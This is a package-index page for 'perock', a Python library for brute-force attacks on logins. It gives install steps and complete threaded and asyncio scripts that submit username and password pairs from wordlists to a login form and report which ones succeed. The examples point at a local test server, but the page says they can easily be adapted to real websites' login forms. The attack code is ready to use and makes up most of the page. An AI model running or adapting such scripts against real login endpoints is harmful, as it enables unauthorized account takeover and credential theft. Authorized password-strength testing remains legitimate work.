Skip to main content

Simple general purpose python bruteforce library

Project description

perock

Description

Perock is Python bruteforce attack library built on threads and asyncio. Its intended for simplifying bruteforce attack by performing common tasks in bruteforce such as calculating cartesian product.

Perock was built to be general purpose in that it can be used for wide variety of bruteforce attack activities. It can be used with html forms, file with passwords, API requiring username and password, etc.

All it takes is defining how to interact with the system/target and validate bruteforce data such as username and password. The rest will be handled for you including when to terminate based on certain conditions which would improve performance.

Pros

  • Simple and easy to get started.
  • Supports concurrency with asycio and threads.
  • Performs faster with optimisations.
  • General purpose(almost any bruteforce attack activity)
  • Bruteforce data can be loaded from csv and json files.

Cons

  • Performs slower than manually written code.
  • Python 3.5 or less not supported.

Install

In your command-line application enter this:

pip install perock

Environment

  • Tested with Python 3.6, 3.8 and 3.10.

Examples

Examples above requires active web server running on http://127.0.0.1:5000.
Source files for the web server and the examples can be found here.

Import neccessay modules

from perock import forcetable
from perock import attack
from perock import runner

import requests
import aiohttp

import asyncio

Setup bruteforce data

# Create field with usernames
usernames_field = forcetable.FieldFile("usernames", "usernames.txt")
usernames_field.set_item_name("username")

# Create field with passwords
passwords_field = forcetable.FieldFile("passwords", "passwords.txt")
passwords_field.set_item_name("password")

# Create table and add fields
table = forcetable.Table()
table.add_field(usernames_field)
table.add_field(passwords_field)
# Sets usernames_field as primary field of table
table.set_primary_field(usernames_field)

# table will handle cartesian product of the fields
# table also contains records created from the fields

Threaded bruteforce attack

class LoginPageAttack(attack.Attack):
    def __init__(self, target, data: dict, retries=1) -> None:
        super().__init__(target, data, retries)
        # self._responce can also be None or Exception
        # Responce can be anything but None and Exception are special.
        self._responce: requests.Response

    @classmethod
    def create_session(cls):
        # Creates session object to use with requests
        # That can improve request performance
        return requests.Session()

    def request(self):
        # Performs request with target and return responce
        if self.session_exists():
            session = self.get_session()
            return session.post(self._target, data=self._data)
        else:
            return requests.post(self._target, data=self._data)
            

    def failure(self):
        # Tests if attempt failed or not
        if self.target_reached():
            if b"Failed to login" in self._responce.content:
                return True
            elif b"No such username" in self._responce.content:
                return True
        return False

    def success(self):
        # Tests if attempt failed or not
        if self.target_reached():
            return b"Login successful" in self._responce.content
        return False

    def target_errors(self):
        if self.target_reached():
            return self._responce.status_code != 200
        return False

    def after_request(self):
        super().after_request()
        if self.failure():
            #print("Attempt failed:", self._data)
            pass
        elif self.success():
            print("Attempt success:", self._data)
        elif self.errors():
            print("Attempt errors:", self._data)
            print("Responce message:", self._responce_msg)


# Creates runner object to perform bruteforce
runner_object = runner.RunnerThread(
    LoginPageAttack, "http://127.0.0.1:5000/login", table)

# Enables optimisation(requires primary field)
runner_object.enable_optimise()
runner_object.run()

Asynchronous bruteforce attack

class LoginPageAttackAsync(attack.AttackAsync):
    def __init__(self, target, data: dict, retries=1) -> None:
        super().__init__(target, data, retries)
        # self._responce can also be None or Exception
        # Responce can be anything but None and Exception are special.
        self._responce: aiohttp.ClientResponse
        self._session: aiohttp.ClientSession

    @classmethod
    async def create_session(cls):
        # Creates session object to use with request
        return aiohttp.ClientSession()

    async def request(self):
        if self.session_exists():
            return await self._session.post(self._target, data=self._data)
        else:
            async with await self.create_session() as session:
                return await session.post(self._target, data=self._data)

    async def failure(self):
        if await self.target_reached():
            if b"Failed to login" in await self._responce.read():
                return True
            elif b"No such username" in await self._responce.read():
                return True
        return False

    async def success(self):
        if await self.target_reached():
            return b"Login successful" in await self._responce.read()
        return False

    async def target_errors(self):
        if await self.target_reached():
            return self._responce.status != 200
        return False

    async def after_request(self):
        await super().after_request()
        if await self.failure():
            #print("Attempt failed:", self._data)
            pass
        elif await self.success():
            print("Attempt success:", self._data)
        elif await self.errors():
            print("Attempt errors:", self._data)
            print("Responce message:", self._responce_msg)


# Creates runner object to perform bruteforce
runner_object = runner.RunnerAsync(
    LoginPageAttackAsync, "http://127.0.0.1:5000/login", table)

# Enables optimisation(requires primary field)
runner_object.enable_optimise()
asyncio.run(runner_object.run())

Free fields resources

# FileField is backed by file object.
# Its important to close it after use.
usernames_field.close()
usernames_field.close()

The examples above can be easily modified based on bruteforcing websites login forms or something unique and different.

Similar projects

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

perock-0.0.2.tar.gz (135.3 kB view details)

Uploaded Source

Built Distribution

perock-0.0.2-py3-none-any.whl (52.8 kB view details)

Uploaded Python 3

File details

Details for the file perock-0.0.2.tar.gz.

File metadata

  • Download URL: perock-0.0.2.tar.gz
  • Upload date:
  • Size: 135.3 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.1 CPython/3.10.0

File hashes

Hashes for perock-0.0.2.tar.gz
Algorithm Hash digest
SHA256 d0f41ad1389aea4e576279038768aa9aa3dc04172783ea9a409a33df7bec7535
MD5 c7ab6d2d2089ee8649aede9d3e28c99d
BLAKE2b-256 127024f59c86b51ebe38378f711c7126224f58dbac78903307528f5dde70c51a

See more details on using hashes here.

File details

Details for the file perock-0.0.2-py3-none-any.whl.

File metadata

  • Download URL: perock-0.0.2-py3-none-any.whl
  • Upload date:
  • Size: 52.8 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.1 CPython/3.10.0

File hashes

Hashes for perock-0.0.2-py3-none-any.whl
Algorithm Hash digest
SHA256 fcb03bf20d7f9f1acfbe6802b4379927cefc5330399901e8f2f171f29a0594c6
MD5 8e426a85505423acd3d6616adb8b8899
BLAKE2b-256 e99ec9c5db58427b3bd2713f1627b990c7b76cfaa0a8101a4e52bb12c01fe4fe

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page